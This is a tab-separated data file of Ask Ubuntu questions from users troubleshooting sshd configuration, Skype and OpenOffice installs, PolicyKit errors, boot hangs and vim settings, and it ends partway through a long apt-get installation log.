218957	12.04 sshd_config file is empty , but my ssh_config is not empty	please know i am no sysadmin . yesterday i re-installed ubuntu 12.04 lts - running 3.2.0-33-generic-pae . i have worked for hours trying to install vsftpd to no avail , and now find myself trying to configure sftp via the sshd , if that makes sense . ps -ef |grep ssh 00:00:00 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session gnome-session -- session=ubuntu notice the size of my sshd_config ls -la /etc/ssh/ -rw-r -- r -- 1 root root 125749 apr 2 2012 moduli -rw-r -- r -- 1 root root 1669 nov 18 11:58 ssh_config -rw-r -- r -- 1 root root 1668 nov 18 11:47 ssh_config~ -rw-r -- r -- 1 root root 20 nov 18 11:25 sshd_config -rw -- -- -- - 1 root root 672 nov 18 11:29 ssh_host_dsa_key -rw-r -- r -- 1 root root 598 nov 18 11:29 ssh_host_dsa_key.pub -rw -- -- -- - 1 root root 227 nov 18 11:29 ssh_host_ecdsa_key -rw-r -- r -- 1 root root 170 nov 18 11:29 ssh_host_ecdsa_key.pub -rw -- -- -- - 1 root root 973 nov 18 11:29 ssh_host_key -rw-r -- r -- 1 root root 638 nov 18 11:29 ssh_host_key.pub -rw -- -- -- - 1 root root 1675 nov 18 11:29 ssh_host_rsa_key -rw-r -- r -- 1 root root 390 nov 18 11:29 ssh_host_rsa_key.pub -rw-r -- r -- 1 root root 302 jan 10 2011 ssh_import_id when i sudo /etc/init.d/ssh restart it starts the ssh , but why not the sshd ? thank you , david
218958	ia32-lib package damaged !	let me start by saying i have no idea what ia32-lib is but i hate it because it 's apparently not working for me i know because i 've been trying to install skype for a month now and i have asked on almost every forum on the internet . so without further ado this is what happens when i attempt to install skype ( i am 64x bit ) link to error : http : //pastebin.com/n43fsxmh in short i get `` package operation failed '' . if you can fix this you are a magician .
218961	`` software ca n't be installed or removed because the authentication service is not available. ``	i have 12.10 ubuntu and when i try to remove / install programs i get notification : software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.104 ' } ) : org.debian.apt.install-or-remove-packages when i log in as root user ( instead of user account that i regulary use ) i have no problems .
218968	what is the purpose of configuration file ?	i am trying to install opencv in my system by following this link . it says that after installing we need to do some configuration by opening /etc/ld.so.conf.d/opencv.conf and typing a particular address . and then in another one /etc/bash.bashrc we are writing pkg_config_path= $ pkg_config_path : /usr/local/lib/pkgconfig export pkg_config_path it will be great if someone can explain how does it help the process .
218971	input director alternative for ubuntu	is there any way i can mirror the mouse movements on two computers ( simultaneously ) using one mouse ? `` input director '' has this but it only works on windows . as far as i know synergy does not support mirroring ? any alternatives ? thanks . p.s . i do n't want to run it using wine .
218974	dual os onhdd . standard linux boot hangs . safe boot option to retry standard loads fine . what 's up ?	new install of ubuntu 12.04 lts from disk from linux user magazine . standard boot hangs . safe boot displays option to retry standard boot and when selected loads fine . have updated os . any suggestions to get standard boot to work ? ubuntu is on disk along with windows xp . thanks ... .
218975	how to hide whitespace indicators in vim	vim was showing some whitespace with commas and periods on a red background which i did n't want . after some googling i was able to get rid of the commas and periods by removing list and listchar lines from .vimrc , i was also hoping this would remove the red backgrounds it was putting in these places , but all it did was change that to white ( see image ) . is it possible to completely remove the whitespace background indicators in vim ? my .vimrc settings can be seen here and the plugins i 'm using are listed here
218981	errors when installing open office	i followed the first set of instructions on this page to install open office : how to install open office ? however , the last step which says to change the chmod of a folder , i got an error saying that the directory does not exist . open office now appears in my ubuntu start menu , but clicking on it does nothing . i tried a reboot . below is what i could copy from my terminal . i am running the latest ubuntu . i have not uninstalled libreoffice as suggested somewhere . the reason is that in the ubuntu software centre , libre office appears to be made up of several components and i do n't know which ones to remove ( or all maybe ? ) . they are libreoffice draw , math , writer , calc . after this operation , 480 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates/universe openjdk-6-jre-lib all 6b24-1.11.5-0ubuntu1~12.10.1 [ 6,135 kb ] get:2 http : //ppa.launchpad.net/upubuntu-com/office/ubuntu/ quantal/main openoffice amd64 3.4~oneiric [ 321 mb ] get:3 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main ca-certificates-java all 20120721 [ 13.2 kb ] get:4 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main tzdata-java all 2012e-0ubuntu2 [ 140 kb ] get:5 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main java-common all 0.43ubuntu3 [ 61.7 kb ] get:6 http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates/universe openjdk-6-jre-headless amd64 6b24-1.11.5-0ubuntu1~12.10.1 [ 25.4 mb ] get:7 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libgif4 amd64 4.1.6-9.1ubuntu1 [ 31.3 kb ] get:8 http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates/universe openjdk-6-jre amd64 6b24-1.11.5-0ubuntu1~12.10.1 [ 234 kb ] get:9 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libatk-wrapper-java all 0.30.4-0ubuntu4 [ 29.8 kb ] get:10 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libatk-wrapper-java-jni amd64 0.30.4-0ubuntu4 [ 31.1 kb ] get:11 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main xorg-sgml-doctools all 1:1.10-1 [ 12.0 kb ] get:12 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main x11proto-core-dev all 7.0.23-1 [ 744 kb ] get:13 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libice-dev amd64 2:1.0.8-2 [ 57.6 kb ] get:14 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libpthread-stubs0 amd64 0.3-3 [ 3,258 b ] get:15 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libpthread-stubs0-dev amd64 0.3-3 [ 2,866 b ] get:16 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libsm-dev amd64 2:1.2.1-2 [ 19.9 kb ] get:17 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxau-dev amd64 1:1.0.7-1 [ 10.2 kb ] get:18 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxdmcp-dev amd64 1:1.1.1-1 [ 26.9 kb ] get:19 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main x11proto-input-dev all 2.2-1 [ 133 kb ] get:20 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main x11proto-kb-dev all 1.0.6-2 [ 269 kb ] get:21 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main xtrans-dev all 1.2.7-1 [ 84.3 kb ] get:22 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxcb1-dev amd64 1.8.1-1ubuntu1 [ 82.6 kb ] get:23 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libx11-dev amd64 2:1.5.0-1 [ 912 kb ] get:24 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libx11-doc all 2:1.5.0-1 [ 2,460 kb ] get:25 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxt-dev amd64 1:1.1.3-1 [ 492 kb ] get:26 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main ttf-dejavu-extra all 2.33-2ubuntu1 [ 3,420 kb ] get:27 http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates/universe icedtea-6-jre-cacao amd64 6b24-1.11.5-0ubuntu1~12.10.1 [ 417 kb ] get:28 http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates/universe icedtea-6-jre-jamvm amd64 6b24-1.11.5-0ubuntu1~12.10.1 [ 581 kb ] get:29 http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates/main icedtea-netx-common all 1.3-1ubuntu1.1 [ 617 kb ] get:30 http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates/main icedtea-netx amd64 1.3-1ubuntu1.1 [ 16.2 kb ] get:31 http : //gb.archive.ubuntu.com/ubuntu/ quantal-updates/universe openjdk-6-jdk amd64 6b24-1.11.5-0ubuntu1~12.10.1 [ 11.1 mb ] fetched 374 mb in 9min 18s ( 671 kb/s ) extract templates from packages : 100 % selecting previously unselected package openjdk-6-jre-lib . ( reading database ... 143191 files and directories currently installed . ) unpacking openjdk-6-jre-lib ( from ... /openjdk-6-jre-lib_6b24-1.11.5-0ubuntu1~12.10.1_all.deb ) ... selecting previously unselected package ca-certificates-java . unpacking ca-certificates-java ( from ... /ca-certificates-java_20120721_all.deb ) ... selecting previously unselected package tzdata-java . unpacking tzdata-java ( from ... /tzdata-java_2012e-0ubuntu2_all.deb ) ... selecting previously unselected package java-common . unpacking java-common ( from ... /java-common_0.43ubuntu3_all.deb ) ... selecting previously unselected package openjdk-6-jre-headless : amd64 . unpacking openjdk-6-jre-headless : amd64 ( from ... /openjdk-6-jre-headless_6b24-1.11.5-0ubuntu1~12.10.1_amd64.deb ) ... selecting previously unselected package libgif4 : amd64 . unpacking libgif4 : amd64 ( from ... /libgif4_4.1.6-9.1ubuntu1_amd64.deb ) ... selecting previously unselected package openjdk-6-jre : amd64 . unpacking openjdk-6-jre : amd64 ( from ... /openjdk-6-jre_6b24-1.11.5-0ubuntu1~12.10.1_amd64.deb ) ... selecting previously unselected package libatk-wrapper-java . unpacking libatk-wrapper-java ( from ... /libatk-wrapper-java_0.30.4-0ubuntu4_all.deb ) ... selecting previously unselected package libatk-wrapper-java-jni : amd64 . unpacking libatk-wrapper-java-jni : amd64 ( from ... /libatk-wrapper-java-jni_0.30.4-0ubuntu4_amd64.deb ) ... selecting previously unselected package xorg-sgml-doctools . unpacking xorg-sgml-doctools ( from ... /xorg-sgml-doctools_1 % 3a1.10-1_all.deb ) ... selecting previously unselected package x11proto-core-dev . unpacking x11proto-core-dev ( from ... /x11proto-core-dev_7.0.23-1_all.deb ) ... selecting previously unselected package libice-dev : amd64 . unpacking libice-dev : amd64 ( from ... /libice-dev_2 % 3a1.0.8-2_amd64.deb ) ... selecting previously unselected package libpthread-stubs0 : amd64 . unpacking libpthread-stubs0 : amd64 ( from ... /libpthread-stubs0_0.3-3_amd64.deb ) ... selecting previously unselected package libpthread-stubs0-dev : amd64 . unpacking libpthread-stubs0-dev : amd64 ( from ... /libpthread-stubs0-dev_0.3-3_amd64.deb ) ... selecting previously unselected package libsm-dev : amd64 . unpacking libsm-dev : amd64 ( from ... /libsm-dev_2 % 3a1.2.1-2_amd64.deb ) ... selecting previously unselected package libxau-dev : amd64 . unpacking libxau-dev : amd64 ( from ... /libxau-dev_1 % 3a1.0.7-1_amd64.deb ) ... selecting previously unselected package libxdmcp-dev : amd64 . unpacking libxdmcp-dev : amd64 ( from ... /libxdmcp-dev_1 % 3a1.1.1-1_amd64.deb ) ... selecting previously unselected package x11proto-input-dev . unpacking x11proto-input-dev ( from ... /x11proto-input-dev_2.2-1_all.deb ) ... selecting previously unselected package x11proto-kb-dev . unpacking x11proto-kb-dev ( from ... /x11proto-kb-dev_1.0.6-2_all.deb ) ... selecting previously unselected package xtrans-dev . unpacking xtrans-dev ( from ... /xtrans-dev_1.2.7-1_all.deb ) ... selecting previously unselected package libxcb1-dev : amd64 . unpacking libxcb1-dev : amd64 ( from ... /libxcb1-dev_1.8.1-1ubuntu1_amd64.deb ) ... selecting previously unselected package libx11-dev : amd64 . unpacking libx11-dev : amd64 ( from ... /libx11-dev_2 % 3a1.5.0-1_amd64.deb ) ... selecting previously unselected package libx11-doc . unpacking libx11-doc ( from ... /libx11-doc_2 % 3a1.5.0-1_all.deb ) ... selecting previously unselected package libxt-dev : amd64 . unpacking libxt-dev : amd64 ( from ... /libxt-dev_1 % 3a1.1.3-1_amd64.deb ) ... selecting previously unselected package ttf-dejavu-extra . unpacking ttf-dejavu-extra ( from ... /ttf-dejavu-extra_2.33-2ubuntu1_all.deb ) ... selecting previously unselected package icedtea-6-jre-cacao : amd64 . unpacking icedtea-6-jre-cacao : amd64 ( from ... /icedtea-6-jre-cacao_6b24-1.11.5-0ubuntu1~12.10.1_amd64.deb ) ... selecting previously unselected package icedtea-6-jre-jamvm : amd64 . unpacking icedtea-6-jre-jamvm : amd64 ( from ... /icedtea-6-jre-jamvm_6b24-1.11.5-0ubuntu1~12.10.1_amd64.deb ) ... selecting previously unselected package icedtea-netx-common . unpacking icedtea-netx-common ( from ... /icedtea-netx-common_1.3-1ubuntu1.1_all.deb ) ... selecting previously unselected package icedtea-netx : amd64 . unpacking icedtea-netx : amd64 ( from ... /icedtea-netx_1.3-1ubuntu1.1_amd64.deb ) ... selecting previously unselected package openjdk-6-jdk : amd64 . unpacking openjdk-6-jdk : amd64 ( from ... /openjdk-6-jdk_6b24-1.11.5-0ubuntu1~12.10.1_amd64.deb ) ... selecting previously unselected package openoffice . unpacking openoffice ( from ... /openoffice_3.4~oneiric_amd64.deb ) ... processing triggers for doc-base ... processing 2 added doc-base files ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for fontconfig ... processing triggers for gnome-icon-theme ... processing triggers for shared-mime-info ... setting up tzdata-java ( 2012e-0ubuntu2 ) ... setting up java-common ( 0.43ubuntu3 ) ... setting up libgif4 : amd64 ( 4.1.6-9.1ubuntu1 ) ... setting up xorg-sgml-doctools ( 1:1.10-1 ) ... setting up x11proto-core-dev ( 7.0.23-1 ) ... setting up libice-dev : amd64 ( 2:1.0.8-2 ) ... setting up libpthread-stubs0 : amd64 ( 0.3-3 ) ... setting up libpthread-stubs0-dev : amd64 ( 0.3-3 ) ... setting up libsm-dev : amd64 ( 2:1.2.1-2 ) ... setting up libxau-dev : amd64 ( 1:1.0.7-1 ) ... setting up libxdmcp-dev : amd64 ( 1:1.1.1-1 ) ... setting up x11proto-input-dev ( 2.2-1 ) ... setting up x11proto-kb-dev ( 1.0.6-2 ) ... setting up xtrans-dev ( 1.2.7-1 ) ... setting up libxcb1-dev : amd64 ( 1.8.1-1ubuntu1 ) ... setting up libx11-dev : amd64 ( 2:1.5.0-1 ) ... setting up libx11-doc ( 2:1.5.0-1 ) ... setting up libxt-dev : amd64 ( 1:1.1.3-1 ) ... setting up ttf-dejavu-extra ( 2.33-2ubuntu1 ) ... setting up icedtea-netx-common ( 1.3-1ubuntu1.1 ) ... setting up openjdk-6-jre-lib ( 6b24-1.11.5-0ubuntu1~12.10.1 ) ... setting up openjdk-6-jre-headless : amd64 ( 6b24-1.11.5-0ubuntu1~12.10.1 ) ... update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java to provide /usr/bin/java ( java ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/keytool to provide /usr/bin/keytool ( keytool ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/pack200 to provide /usr/bin/pack200 ( pack200 ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/rmid to provide /usr/bin/rmid ( rmid ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/rmiregistry to provide /usr/bin/rmiregistry ( rmiregistry ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/unpack200 to provide /usr/bin/unpack200 ( unpack200 ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/orbd to provide /usr/bin/orbd ( orbd ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/servertool to provide /usr/bin/servertool ( servertool ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/tnameserv to provide /usr/bin/tnameserv ( tnameserv ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/jexec to provide /usr/bin/jexec ( jexec ) in auto mode setting up ca-certificates-java ( 20120721 ) ... adding debian : deutsche_telekom_root_ca_2.pem adding debian : comodo_trusted_services_root.pem adding debian : certum_trusted_network_ca.pem adding debian : thawte_primary_root_ca_-_g2.pem adding debian : utn_userfirst_hardware_root_ca.pem adding debian : addtrust_low-value_services_root.pem adding debian : microsec_e-szigno_root_ca.pem adding debian : swisssign_silver_ca_-_g2.pem adding debian : comsign_secured_ca.pem adding debian : buypass_class_2_ca_1.pem adding debian : verisign_class_1_public_primary_certification_authority_-_g3.pem adding debian : certum_root_ca.pem adding debian : addtrust_external_root.pem adding debian : chambers_of_commerce_root_-_2008.pem adding debian : starfield_root_certificate_authority_-_g2.pem adding debian : verisign_class_1_public_primary_certification_authority_-_g2.pem adding debian : visa_ecommerce_root.pem adding debian : digital_signature_trust_co._global_ca_3.pem adding debian : ac_raíz_certicámara_s.a..pem adding debian : netlock_arany_=class_gold=_főtanúsítvány.pem adding debian : taiwan_grca.pem adding debian : camerfirma_chambers_of_commerce_root.pem adding debian : juur-sk.pem adding debian : entrust.net_premium_2048_secure_server_ca.pem adding debian : xramp_global_ca_root.pem adding debian : security_communication_rootca2.pem adding debian : addtrust_qualified_certificates_root.pem adding debian : netlock_qualified_=class_qa=_root.pem adding debian : tc_trustcenter_class_2_ca_ii.pem adding debian : dst_aces_ca_x6.pem adding debian : thawte_primary_root_ca.pem adding debian : thawte_primary_root_ca_-_g3.pem adding debian : geotrust_universal_ca_2.pem adding debian : acedicom_root.pem adding debian : security_communication_ev_rootca1.pem adding debian : america_online_root_certification_authority_2.pem adding debian : tc_trustcenter_universal_ca_i.pem adding debian : swisssign_platinum_ca_-_g2.pem adding debian : global_chambersign_root_-_2008.pem adding debian : securesign_rootca11.pem adding debian : geotrust_global_ca_2.pem adding debian : buypass_class_3_ca_1.pem adding debian : baltimore_cybertrust_root.pem adding debian : ubuntuone-go_daddy_class_2_ca.pem adding debian : equifax_secure_ebusiness_ca_1.pem adding debian : swisssign_gold_ca_-_g2.pem adding debian : affirmtrust_premium_ecc.pem adding debian : tc_trustcenter_universal_ca_iii.pem adding debian : ca.pem adding debian : verisign_class_3_public_primary_certification_authority_-_g2.pem adding debian : netlock_express_=class_c=_root.pem adding debian : verisign_class_3_public_primary_certification_authority_-_g5.pem adding debian : firmaprofesional_root_ca.pem adding debian : comodo_secure_services_root.pem adding debian : cacert.org.pem adding debian : geotrust_primary_certification_authority.pem adding debian : rsa_security_2048_v3.pem adding debian : staat_der_nederlanden_root_ca.pem adding debian : cybertrust_global_root.pem adding debian : digicert_high_assurance_ev_root_ca.pem adding debian : tdc_oces_root_ca.pem adding debian : a-trust-nqual-03.pem adding debian : equifax_secure_ca.pem adding debian : digital_signature_trust_co._global_ca_1.pem adding debian : geotrust_global_ca.pem adding debian : starfield_class_2_ca.pem adding debian : applicationca_-_japanese_government.pem adding debian : swisscom_root_ca_1.pem adding debian : verisign_class_2_public_primary_certification_authority_-_g2.pem adding debian : camerfirma_global_chambersign_root.pem adding debian : quovadis_root_ca_3.pem adding debian : quovadis_root_ca.pem adding debian : comodo_aaa_services_root.pem adding debian : comsign_ca.pem adding debian : addtrust_public_services_root.pem adding debian : digicert_assured_id_root_ca.pem adding debian : utn_datacorp_sgc_root_ca.pem adding debian : ca_disig.pem adding debian : e-guven_kok_elektronik_sertifika_hizmet_saglayicisi.pem adding debian : globalsign_root_ca_-_r3.pem adding debian : quovadis_root_ca_2.pem adding debian : entrust_root_certification_authority.pem adding debian : gte_cybertrust_global_root.pem adding debian : valicert_class_1_va.pem adding debian : autoridad_de_certificacion_firmaprofesional_cif_a62634068.pem adding debian : geotrust_primary_certification_authority_-_g2.pem adding debian : spi-ca-2003.pem adding debian : america_online_root_certification_authority_1.pem adding debian : affirmtrust_premium.pem adding debian : sonera_class_1_root_ca.pem adding debian : verisign_class_2_public_primary_certification_authority_-_g3.pem adding debian : certplus_class_2_primary_ca.pem adding debian : turktrust_certificate_services_provider_root_2.pem adding debian : network_solutions_certificate_authority.pem adding debian : go_daddy_class_2_ca.pem adding debian : startcom_certification_authority.pem adding debian : hongkong_post_root_ca_1.pem adding debian : hellenic_academic_and_research_institutions_rootca_2011.pem adding debian : thawte_premium_server_ca.pem adding debian : ebg_elektronik_sertifika_hizmet_sağlayıcısı.pem adding debian : turktrust_certificate_services_provider_root_1.pem adding debian : netlock_business_=class_b=_root.pem adding debian : microsec_e-szigno_root_ca_2009.pem adding debian : digicert_global_root_ca.pem adding debian : verisign_class_3_public_primary_certification_authority_-_g4.pem adding debian : igc_a.pem adding debian : twca_root_certification_authority.pem adding debian : s-trust_authentication_and_encryption_root_ca_2005_pn.pem adding debian : verisign_universal_root_certification_authority.pem adding debian : dst_root_ca_x3.pem adding debian : verisign_class_1_public_primary_certification_authority.pem adding debian : root_ca_generalitat_valenciana.pem adding debian : utn_userfirst_email_root_ca.pem adding debian : ssl-cert-snakeoil.pem adding debian : starfield_services_root_certificate_authority_-_g2.pem adding debian : geotrust_primary_certification_authority_-_g3.pem adding debian : certinomis_-_autorité_racine.pem adding debian : verisign_class_3_public_primary_certification_authority.pem adding debian : tdc_internet_root_ca.pem adding debian : ubuntuone-valicert_class_2_va.pem adding debian : affirmtrust_commercial.pem adding debian : spi-cacert-2008.pem adding debian : izenpe.com.pem adding debian : ec-acc.pem adding debian : go_daddy_root_certificate_authority_-_g2.pem adding debian : comodo_ecc_certification_authority.pem adding debian : cnnic_root.pem adding debian : netlock_notary_=class_a=_root.pem adding debian : equifax_secure_ebusiness_ca_2.pem adding debian : verisign_class_3_public_primary_certification_authority_-_g3.pem adding debian : secure_global_ca.pem adding debian : ubuntuone-go_daddy_ca.pem adding debian : geotrust_universal_ca.pem adding debian : wells_fargo_root_ca.pem adding debian : thawte_server_ca.pem adding debian : wellssecure_public_root_certificate_authority.pem adding debian : tc_trustcenter_class_3_ca_ii.pem adding debian : comodo_certification_authority.pem adding debian : equifax_secure_global_ebusiness_ca.pem adding debian : security_communication_root_ca.pem adding debian : globalsign_root_ca_-_r2.pem adding debian : tübitak_uekae_kök_sertifika_hizmet_sağlayıcısı_-_sürüm_3.pem adding debian : verisign_class_4_public_primary_certification_authority_-_g3.pem adding debian : certsign_root_ca.pem adding debian : rsa_root_certificate_1.pem adding debian : epki_root_certification_authority.pem adding debian : entrust.net_secure_server_ca.pem adding debian : oiste_wisekey_global_root_ga_ca.pem adding debian : sonera_class_2_root_ca.pem adding debian : certigna.pem adding debian : affirmtrust_networking.pem adding debian : valicert_class_2_va.pem adding debian : globalsign_root_ca.pem adding debian : staat_der_nederlanden_root_ca_-_g2.pem adding debian : securetrust_ca.pem done . setting up openjdk-6-jre : amd64 ( 6b24-1.11.5-0ubuntu1~12.10.1 ) ... update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/policytool to provide /usr/bin/policytool ( policytool ) in auto mode setting up libatk-wrapper-java ( 0.30.4-0ubuntu4 ) ... setting up icedtea-6-jre-cacao : amd64 ( 6b24-1.11.5-0ubuntu1~12.10.1 ) ... setting up icedtea-6-jre-jamvm : amd64 ( 6b24-1.11.5-0ubuntu1~12.10.1 ) ... setting up icedtea-netx : amd64 ( 1.3-1ubuntu1.1 ) ... update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/javaws to provide /usr/bin/javaws ( javaws ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/itweb-settings to provide /usr/bin/itweb-settings ( itweb-settings ) in auto mode update-alternatives : using /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/javaws to provide /usr/bin/javaws ( javaws ) in auto mode update-alternatives : using /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/itweb-settings to provide /usr/bin/itweb-settings ( itweb-settings ) in auto mode setting up openjdk-6-jdk : amd64 ( 6b24-1.11.5-0ubuntu1~12.10.1 ) ... update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/appletviewer to provide /usr/bin/appletviewer ( appletviewer ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/extcheck to provide /usr/bin/extcheck ( extcheck ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/idlj to provide /usr/bin/idlj ( idlj ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jar to provide /usr/bin/jar ( jar ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jarsigner to provide /usr/bin/jarsigner ( jarsigner ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/javac to provide /usr/bin/javac ( javac ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/javadoc to provide /usr/bin/javadoc ( javadoc ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/javah to provide /usr/bin/javah ( javah ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/javap to provide /usr/bin/javap ( javap ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jconsole to provide /usr/bin/jconsole ( jconsole ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jdb to provide /usr/bin/jdb ( jdb ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jhat to provide /usr/bin/jhat ( jhat ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jinfo to provide /usr/bin/jinfo ( jinfo ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jmap to provide /usr/bin/jmap ( jmap ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jps to provide /usr/bin/jps ( jps ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jrunscript to provide /usr/bin/jrunscript ( jrunscript ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jsadebugd to provide /usr/bin/jsadebugd ( jsadebugd ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jstack to provide /usr/bin/jstack ( jstack ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jstat to provide /usr/bin/jstat ( jstat ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/jstatd to provide /usr/bin/jstatd ( jstatd ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/native2ascii to provide /usr/bin/native2ascii ( native2ascii ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/rmic to provide /usr/bin/rmic ( rmic ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/schemagen to provide /usr/bin/schemagen ( schemagen ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/serialver to provide /usr/bin/serialver ( serialver ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/wsgen to provide /usr/bin/wsgen ( wsgen ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/wsimport to provide /usr/bin/wsimport ( wsimport ) in auto mode update-alternatives : using /usr/lib/jvm/java-6-openjdk-amd64/bin/xjc to provide /usr/bin/xjc ( xjc ) in auto mode setting up openoffice ( 3.4~oneiric ) ... setting up libatk-wrapper-java-jni : amd64 ( 0.30.4-0ubuntu4 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place philip @ x301-2 : ~ $ sudo apt-get install libxrandr2 : i386 libxinerama1 : i386 reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : linux-headers-3.5.0-17 use 'apt-get autoremove ' to remove it . the following extra packages will be installed : gcc-4.7-base : i386 libc6 : i386 libgcc1 : i386 libx11-6 : i386 libxau6 : i386 libxcb1 : i386 libxdmcp6 : i386 libxext6 : i386 libxrender1 : i386 suggested packages : glibc-doc : i386 locales : i386 the following new packages will be installed gcc-4.7-base : i386 libc6 : i386 libgcc1 : i386 libx11-6 : i386 libxau6 : i386 libxcb1 : i386 libxdmcp6 : i386 libxext6 : i386 libxinerama1 : i386 libxrandr2 : i386 libxrender1 : i386 0 upgraded , 11 newly installed , 0 to remove and 93 not upgraded . need to get 4,936 kb of archives . after this operation , 11.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main gcc-4.7-base i386 4.7.2-2ubuntu1 [ 15.5 kb ] get:2 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libc6 i386 2.15-0ubuntu20 [ 3,940 kb ] get:3 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libgcc1 i386 1:4.7.2-2ubuntu1 [ 53.5 kb ] get:4 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxau6 i386 1:1.0.7-1 [ 8,582 b ] get:5 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxdmcp6 i386 1:1.1.1-1 [ 13.1 kb ] get:6 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxcb1 i386 1.8.1-1ubuntu1 [ 48.7 kb ] get:7 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libx11-6 i386 2:1.5.0-1 [ 776 kb ] get:8 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxext6 i386 2:1.3.1-2 [ 33.9 kb ] get:9 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxinerama1 i386 2:1.1.2-1 [ 8,118 b ] get:10 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxrender1 i386 1:0.9.7-1 [ 20.1 kb ] get:11 http : //gb.archive.ubuntu.com/ubuntu/ quantal/main libxrandr2 i386 2:1.4.0-1 [ 18.8 kb ] fetched 4,936 kb in 30s ( 161 kb/s ) preconfiguring packages ... selecting previously unselected package gcc-4.7-base : i386 . ( reading 